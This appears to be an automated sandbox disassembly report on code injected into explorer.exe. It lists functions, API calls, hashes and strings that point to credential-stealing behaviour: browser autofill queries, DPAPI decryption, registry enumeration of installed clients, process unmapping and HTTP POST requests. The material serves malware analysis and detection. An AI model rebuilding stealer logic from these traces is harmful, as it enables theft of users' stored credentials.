Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: b0c9ea34d8e176138a4a73a84b9b7ce8b8ee6a350bc51f57f81c0e8e45a0d846
Instruction ID: ebab245d5ddaada603f61cb381ac118924196a51c06e8ba3113981eb9092ee89
Opcode Fuzzy Hash: b0c9ea34d8e176138a4a73a84b9b7ce8b8ee6a350bc51f57f81c0e8e45a0d846
Instruction Fuzzy Hash: 422142726043456BD711FA68CC80ABFB6DDBFD4B10F44052EF985D6242EB78CE458B92

Function 000E9247 Relevance: 6.3, APIs: 4, Instructions: 343
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.525291505.00000000000E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_e7000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32cff0085485b113b410e7b3abe0a5548784767886e41f63bb0010d8f190109a
Instruction ID: dcaca065243f0d70f2ab4f0c9d63f603a6d20bde16016ca0a8fb04a3348964b3
Opcode Fuzzy Hash: 32cff0085485b113b410e7b3abe0a5548784767886e41f63bb0010d8f190109a
Instruction Fuzzy Hash: 39A16CB29147D25FDB218E79CCC4AA5BBE1EB52324B2C076CC9E1EB2C2E7605807C751

Function 00084B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00081162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0008116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00084BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 00084BBF

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: d0a03c3171f669cc561320088f6ee0b01d3cc8f87ebe377cc262c45c340fd0ba
Instruction ID: ad46feb75ece9f9ea336e87747d93cc9b1d5618f1d304d4bead63fb95cb474d7
Opcode Fuzzy Hash: d0a03c3171f669cc561320088f6ee0b01d3cc8f87ebe377cc262c45c340fd0ba
Instruction Fuzzy Hash: BCE0D83180121167D654BB70FC5DBDB3F9CBF95361F10C525F2D592092CB36C8418760

Function 00081000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 0417845d3711d0a8ab48dba37f0f1e8bfd2c70249a97d61b699baedc1fc7043a
Instruction ID: 3009fa2e25c99c58cd3ca466f84c0bc78be797b351bcccef6327f5f67131da02
Opcode Fuzzy Hash: 0417845d3711d0a8ab48dba37f0f1e8bfd2c70249a97d61b699baedc1fc7043a
Instruction Fuzzy Hash: A7A002795511155BFD4457E4DE0DA1A3718F745702F144545B54586051DD6954048731

Function 00086512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(000E20A4,00000001,00000000,0000000A,000D3127,000828DA,00000000,?), ref: 0008BFFC

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: fbb64045412140bb3376d61c47bde30dc89874f3f158a0a622b249d2581c492c
Instruction ID: fcf2bef7cef12bb3f0d298ad8fb68d6f40796599fadd71bb1614cf323cac156c
Opcode Fuzzy Hash: fbb64045412140bb3376d61c47bde30dc89874f3f158a0a622b249d2581c492c
Instruction Fuzzy Hash: 61E0923178878078F62033B96C07FDA15446B80F20F614625B754BC1CFCFB780805222

Function 00083C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 00083C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083C76
DeleteFileW.KERNEL32(00000000), ref: 00083C7D
CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00083D2F
lstrlen.KERNEL32(00000000), ref: 00083D36
wsprintfA.USER32 ref: 00083D55
lstrlen.KERNEL32(00000000), ref: 00083D61
lstrcat.KERNEL32(00000000,?), ref: 00083D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00083DB2
DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00083DED

Strings

SELECT name,value FROM autofill, xrefs: 00083CAA
AUTOFILL, xrefs: 00083DBD, 00083DC2, 00083DCC
%s = %s, xrefs: 00083D4F

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: 156d9d91afbf66ab9bacdf8f621a9befe06fdc2544cda769dd44be048fcfa586
Instruction ID: 5fc246d5280d0b4c4e5f44c9b136f416c62594648c96d7d0805e589a6c6bd98a
Opcode Fuzzy Hash: 156d9d91afbf66ab9bacdf8f621a9befe06fdc2544cda769dd44be048fcfa586
Instruction Fuzzy Hash: 1A416A31204341ABD711BB64DC81ABF7BEDBFC5744F004829F986A6253DA2ADD028B62

Function 00081333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

Part of subcall function 0008106C: lstrlen.KERNEL32(0067B176,00000000,00000000,00000000,00081366,75712B62,0067B176,00000000), ref: 00081074
Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,0067B176,00000001,00000000,00000000), ref: 00081086

Part of subcall function 000812A3: RtlZeroMemory.NTDLL(?,00000018), ref: 000812B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 000813C2
wsprintfW.USER32 ref: 000814B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081594

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 000814FB
Accept: */*Referer: %S, xrefs: 000814AF
POST, xrefs: 00081465

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 830c9e34ae569718e1b24a9443c08e33e059627cae808b8f3f1a54efc27655ce
Instruction ID: 7d30e111299667a329711f4808220047800665f4415cfff5e0d1aa668d8bc341
Opcode Fuzzy Hash: 830c9e34ae569718e1b24a9443c08e33e059627cae808b8f3f1a54efc27655ce
Instruction Fuzzy Hash: 7D718A74608301AFD750AF24DC84AABBBEDFF88344F04092EF995C3252DB75D9058BA2

Function 0008A40E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 0008A455
memcpy.NTDLL(?,?,?), ref: 0008A479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 0008A4DB
memset.NTDLL ref: 0008A546

Strings

S, xrefs: 0008A4DB
winRead, xrefs: 0008A515

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead$S
API String ID: 2051157613-3859733311
Opcode ID: bde34e08940a5130dac1807a5a62c036b30e63eb355d3be97c081e77bc4c7292
Instruction ID: a448c403023d706c5321a739c0c01a4e33aea86af15eac139fec1e7941e37ac6
Opcode Fuzzy Hash: bde34e08940a5130dac1807a5a62c036b30e63eb355d3be97c081e77bc4c7292
Instruction Fuzzy Hash: 4B318D72705340ABEB50EE18CC8599F77E6FFC5350F84692AF98597611D670EC048B93

Function 0008B87B Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 202
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0008B8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0008B96F

Strings

S, xrefs: 0008B96F
winOpen, xrefs: 0008BA22
psow, xrefs: 0008BA95

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen$S
API String ID: 2416746761-2586101589
Opcode ID: 12164cb21f261cdadd353abf1e934a4ba790bd36f114a5547278b584b4ed5aa7
Instruction ID: abee809fe31a5a6538aaceb5af34820908a67b249fbf2f2df2ee654d3b299c62
Opcode Fuzzy Hash: 12164cb21f261cdadd353abf1e934a4ba790bd36f114a5547278b584b4ed5aa7
Instruction Fuzzy Hash: 53718D71A04702DFD750EF28C88175ABBE0FF88724F104A29F9E8A7292D774D954CB92

Function 00082E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.SHLWAPI(?,?), ref: 00082E4B
RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00082EE4
RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00082F54
RegCloseKey.KERNEL32(?), ref: 00082F62

Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98

Part of subcall function 00081BC5: lstrlenW.KERNEL32(00000000,00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081BCC
Part of subcall function 00081BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 00081BF0
Part of subcall function 00081BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00081C05
Part of subcall function 00081BC5: lstrlenW.KERNEL32(00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081C1C

Part of subcall function 00081AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00081B16

Strings

PathToExe, xrefs: 00082E5E

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: 176bef6c441af3b74209ea396fc40097f656177413e2de5b0ffeb482d9c6ff9b
Instruction ID: 737ea95267dbba0b38d2cc2ed97825fc8b79697e55c450d9c33e4e3cb90f41d0
Opcode Fuzzy Hash: 176bef6c441af3b74209ea396fc40097f656177413e2de5b0ffeb482d9c6ff9b
Instruction Fuzzy Hash: D4317A71604211AF9B15AF21CC159AF7AEAFFC4350B04852DF89987282EE75C902DBA1

Function 00084A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

wsprintfW.USER32 ref: 00084AA2
RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00084AC7
RegCloseKey.ADVAPI32(?), ref: 00084AD4

Strings

Software, xrefs: 00084A95
%s\%08x, xrefs: 00084A9C

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: 45d3ed723e8728aaf1a2cd76e0cfc109dc4998e35e31a87ae645a26b94ee33a0
Instruction ID: 5840dc6503cc108a31221738e39441bd1e23fba901afdc883f4ef9a0ed6d19d0
Opcode Fuzzy Hash: 45d3ed723e8728aaf1a2cd76e0cfc109dc4998e35e31a87ae645a26b94ee33a0
Instruction Fuzzy Hash: A8012B71601108BFE7189F54DC8AEFF7BADEB44344F40016FF905A3141D6B26D409671

Function 00084317 Relevance: 7.6, APIs: 5, Instructions: 64
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alloca_probe.NTDLL ref: 0008431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00084335
RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00084363
RegCloseKey.ADVAPI32(?), ref: 000843C8

Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994

Part of subcall function 0008418A: wsprintfW.USER32 ref: 00084212

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000843B9

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 94190413aac87ea3199495c5d956d1a7f457b02da9cdaf68acba56015df3a036
Instruction ID: b5ac95aea56f536f4b5c73fd8efd5d921aaf08e2ac68ca3006de1c18578d18ae
Opcode Fuzzy Hash: 94190413aac87ea3199495c5d956d1a7f457b02da9cdaf68acba56015df3a036
Instruction Fuzzy Hash: A9112EB1104201BFE715AB10DC49DFB7BEDFB88344F00452EF889D2151EA799E499B72

Function 000819E5 Relevance: 6.1, APIs: 4, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: cbca13c41e6ad2c3ad6aba8c637af935e3bc4f0f4e53dd87436683ca29ff9f23
Instruction ID: c5571b0ed83ab8e9de6be7d93e5e899f2560c22a91db0528a38c0e6b8d46ffb2
Opcode Fuzzy Hash: cbca13c41e6ad2c3ad6aba8c637af935e3bc4f0f4e53dd87436683ca29ff9f23
Instruction Fuzzy Hash: 92217E7220A2416FE7289A21CD04FBBBBEDFFC8B54F040A2DF9D592151E625CD428722

Function 00081EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 00081ED5

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081F0C
RegCloseKey.ADVAPI32(?), ref: 00081F98

Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081F82

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: 7b9333fcc51c797b5218fbb23d2e6c6254682b66609f70ce016f7fe61c2493e6
Instruction ID: 4f23505752de744da42dfdbb6d717c3d1c776ca37b4fc414fa7c845c11fa981a
Opcode Fuzzy Hash: 7b9333fcc51c797b5218fbb23d2e6c6254682b66609f70ce016f7fe61c2493e6
Instruction Fuzzy Hash: 7D214F712083016FD705AB21DC45EAB7BEDFF88344F00492DF8D992152DB75C9069B61

Function 00081C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00081C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00083FA8), ref: 00081C56
CloseHandle.KERNEL32(00000000), ref: 00081C91

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00081C76

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 58ece550bef03a12f2c8c95344160bdb53c7dc2287bfa5caa7a1e707ffd5121a
Instruction ID: 222b11b4eaba821b6a78fa1be4fe8e728b09ea9ad0825c6bb9d4c4a76c9ad33d
Opcode Fuzzy Hash: 58ece550bef03a12f2c8c95344160bdb53c7dc2287bfa5caa7a1e707ffd5121a
Instruction Fuzzy Hash: E7F028312012187BD2202B26DC88EBB7F9CEF467F6F15031AF905931D1DB576C024670

Function 00082EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00082EE4
RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00082F54
RegCloseKey.KERNEL32(?), ref: 00082F62

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: 2ad7e6767ee96b79d21ba100cb8b695183dda1ff5abafa8c65141433d0a563cb
Instruction ID: eb41579e80b7c950b35f1486a4d2b204f65a8b7140ff6c4f8f4aa4cb4ca9842d
Opcode Fuzzy Hash: 2ad7e6767ee96b79d21ba100cb8b695183dda1ff5abafa8c65141433d0a563cb
Instruction Fuzzy Hash: C5016231205250AB9715BF21DC05EEF7FADFFC4351F00442DF99992192DA758846EFA1

Function 00084B72 Relevance: 4.5, APIs: 3, Instructions: 8comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00084B74
OleUninitialize.OLE32 ref: 00084B83
ExitProcess.KERNEL32 ref: 00084B8B

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: 518c430dfff4d9d4c723df7a32eae010c3fc126e0e84deb4cb3f28f6201afda5
Instruction ID: c567147c66812ba5e2ac9ba65c59c1b167aaf398ae84f332e5484db75709233c
Opcode Fuzzy Hash: 518c430dfff4d9d4c723df7a32eae010c3fc126e0e84deb4cb3f28f6201afda5
Instruction Fuzzy Hash: B2C09B343465014BF6C03BF05C0D7193758BF00757F045013FA45CA091DF5644008B33

Function 00089FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00089FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0008A00E

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: 1e6db2da140d01e1a68dfa4cea175d4ba005d2fcd999c214ed22800c6a33e8df
Instruction ID: de4c9e21946e3b268851ec9f55ea6e7eb272948646484cd6e4629a4b53bf34a6
Opcode Fuzzy Hash: 1e6db2da140d01e1a68dfa4cea175d4ba005d2fcd999c214ed22800c6a33e8df
Instruction Fuzzy Hash: CCF0F672704381BAF7313A549C88F7B679CFB95B85F24043AFAC5E6241E670AC408731

Function 00081AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00081B16

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00081B40

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: d8da52ebf54bab53ae3ca41385c84507770efb2167d087fcb706d6c52b73b34a
Instruction ID: 337aa3add9a7764b0e93f6c42cfcb22d188dfd0b15f865120cd01d535eb4066c
Opcode Fuzzy Hash: d8da52ebf54bab53ae3ca41385c84507770efb2167d087fcb706d6c52b73b34a
Instruction Fuzzy Hash: D3F0BB3670064817D611752ACC84EE7368EEFD53A67160029F49993242DF676C425374

Function 00089EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02730000,00000000,?), ref: 00089EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00089ECD

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 571bb11c0abf0816024da647f261a0c95338da32ac75e42e57d66a358eef1667
Instruction ID: 6d0ecc66742d84c592a4f73b3664b1b7ebf4e9bfc3f597e36e2858d6c86bab0f
Opcode Fuzzy Hash: 571bb11c0abf0816024da647f261a0c95338da32ac75e42e57d66a358eef1667
Instruction Fuzzy Hash: 48E0C2336082507BD2123798AC45FBFBB69EB94F50F090025FA44BA665C2789C0187A3

Function 00081B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
CloseHandle.KERNEL32(00000000), ref: 00081B8F

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
